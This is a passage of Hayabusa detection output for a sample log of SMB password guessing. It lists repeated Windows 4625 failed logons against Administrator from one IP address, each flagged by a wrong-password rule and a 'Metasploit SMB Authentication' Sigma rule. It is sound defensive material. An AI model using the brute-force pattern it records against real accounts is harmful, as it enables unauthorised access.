Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YVFm1epksVGO1nFY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YmVehuMHvh5kVqRW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sERZrNUHsKVEShCb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eaSNgw2hvkxLnQF8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FSYOWptgxHYTDv1x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Van1qwuRoWYPWrIY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyLCa9OHocazZKQ2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XxrR5iUsTI9LVnLL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TxMREacN0QfvL51B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7fbzSHaZBDH4zFZZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NgIei0bMIcslJCVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JPoKjwanczELBC5A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QOYMVAnCWB2RFYAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k1S45GBtQ8Uoyilw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 60oeDAnU41sz1wYg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enjlrrdf6lrm7Bao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 58WzO6wxh7QshZgS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7eZKzHgu5ADLYsWU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uOSK3xC1E5PpBVNM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vFXasYWGCHbQOWWI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XlYJ3oHYKYhg0KC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LxOKwi8Q4y2mHBDu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwFKFySH4w2yWtPX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OlwGTGadOEMfUFiM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hZ9WuMoOtxGdwOQn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cCLK0gWvRoz0Ceao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZDrcOxtm2fHXK5pO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pm2tPGetcAJkSuvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FBskiUSfF2ghuDcF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZJal2nq3JAk6I2S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y9ek0Sl1ikhIfIb6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eHrn5Tp9JtnAgCbE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k7tR8gp2piqqixqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SqSBRMoiFeWe4FAt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nu4m1xKDU0OUkoR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gui98cdQHPgyNOZI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bm4U7TAfsPTEiygC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fDOoaVWVFAMLiA71 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qiJeLgInEkHffefo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWyguWQP2iYUArhD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vDa3GqsTMMXguFhi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lr0lkAcdnji1zjW4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4WfNFd5MkQxaxHGP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j8hdPhtxP4Ds65yV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y2BBoWoXWXuRysTx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6GEhZ2BduHwjJj9H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GbwEHQCAUJd64LlA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 